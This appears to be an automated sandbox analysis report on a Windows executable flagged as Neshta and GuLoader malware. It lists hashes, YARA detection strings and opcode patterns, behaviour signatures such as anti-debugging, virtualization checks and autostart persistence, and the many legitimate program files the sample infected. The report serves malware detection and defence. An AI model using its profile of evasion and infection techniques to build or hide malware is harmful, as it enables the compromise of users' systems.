
Windows Analysis Report Z68mMCAxFZ.exe

Overview

General Information

Sample Name: Z68mMCAxFZ.exe
Analysis ID: 490869
MD5: 547612a9ff746063a74c71b009230500
SHA1: c04b0adc612addc701e3a0336a4e8a23fbd331c4
SHA256: bf99b231b81ab2ba895c0cbf395a5fdb5fc18d3465592150e365f31302c8250a
Tags: exe, Neshta

Detection

GuLoader, Neshta
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Potential malicious icon found
Yara detected Neshta
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
GuLoader behavior detected
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Drops PE files with a suspicious file extension
Tries to detect Any.run
Drops executable to a common third party application directory
Machine Learning detection for sample
Tries to detect virtualization through RDTSC time measurements
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Found dropped PE file which has not been started or loaded
Abnormal high CPU Usage
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • Z68mMCAxFZ.exe (PID: 6284 cmdline: 'C:\Users\user\Desktop\Z68mMCAxFZ.exe' MD5: 547612A9FF746063A74C71B009230500)
    • Z68mMCAxFZ.exe (PID: 6584 cmdline: 'C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe' MD5: 6CE7CC1F376F6BD9D090EAF04EF72DFE)
      • Z68mMCAxFZ.exe (PID: 4488 cmdline: 'C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe' MD5: 6CE7CC1F376F6BD9D090EAF04EF72DFE)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: Z68mMCAxFZ.exe, Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Author: Florian Roth
Strings:
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
Source: Z68mMCAxFZ.exe, Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Author: Joe Security

Dropped Files

Source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Author: Florian Roth
Strings:
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
Source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Author: Joe Security
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Author: Florian Roth
Strings:
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Author: Joe Security
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Author: Florian Roth
Strings:
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
(3 of 215 dropped-file entries shown)

Memory Dumps

Source: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Author: Joe Security
Source: 0000000F.00000002.938917460.0000000000560000.00000040.00000001.sdmp, Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Author: Joe Security
Source: Process Memory Space: Z68mMCAxFZ.exe PID: 6284, Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Author: Joe Security

Unpacked PEs

Source: 0.0.Z68mMCAxFZ.exe.400000.0.unpack, Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Author: Florian Roth
Strings:
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
Source: 0.0.Z68mMCAxFZ.exe.400000.0.unpack, Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Author: Joe Security
Source: 0.2.Z68mMCAxFZ.exe.400000.0.unpack, Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Author: Florian Roth
Strings:
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
Source: 0.2.Z68mMCAxFZ.exe.400000.0.unpack, Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Author: Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: Z68mMCAxFZ.exe, Virustotal: Detection: 85%
Antivirus / Scanner detection for submitted sample
Source: Z68mMCAxFZ.exe, Avira: detected
Antivirus detection for dropped file
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, Avira: detection malicious, Label: W32/Neshta.A
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Avira: detection malicious, Label: W32/Neshta.A
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, ReversingLabs: Detection: 95%
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, ReversingLabs: Detection: 95%
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, ReversingLabs: Detection: 95%
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, ReversingLabs: Detection: 96%
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, ReversingLabs: Detection: 96%
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, Metadefender: Detection: 91%
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, ReversingLabs: Detection: 96%
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, ReversingLabs: Detection: 93%
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, ReversingLabs: Detection: 95%
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, ReversingLabs: Detection: 96%
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, ReversingLabs: Detection: 96%
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, ReversingLabs: Detection: 96%
Machine Learning detection for sample
Source: Z68mMCAxFZ.exe, Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Joe Sandbox ML: detected
Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, Joe Sandbox ML: detected
Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.Z68mMCAxFZ.exe.400000.0.unpack, Avira: Label: W32/Neshta.A
Source: 0.0.Z68mMCAxFZ.exe.400000.0.unpack, Avira: Label: W32/Neshta.A
Uses 32bit PE files
Source: Z68mMCAxFZ.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Spreading:

Yara detected Neshta
Source: Yara match, File source: Z68mMCAxFZ.exe, type: SAMPLE
Source: Yara match, File source: 0.0.Z68mMCAxFZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.Z68mMCAxFZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: Z68mMCAxFZ.exe PID: 6284, type: MEMORYSTR
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
Source: Yara match, File source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPED
Source: Yara match, File source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPED
Source: Yara match, File source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPED
Source: Yara match, File source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPED
Source: Yara match, File source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPED
Source: Yara match, File source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPED
Source: Yara match, File source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED
Source: Yara match, File source: C:\Windows\svchost.com, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPED
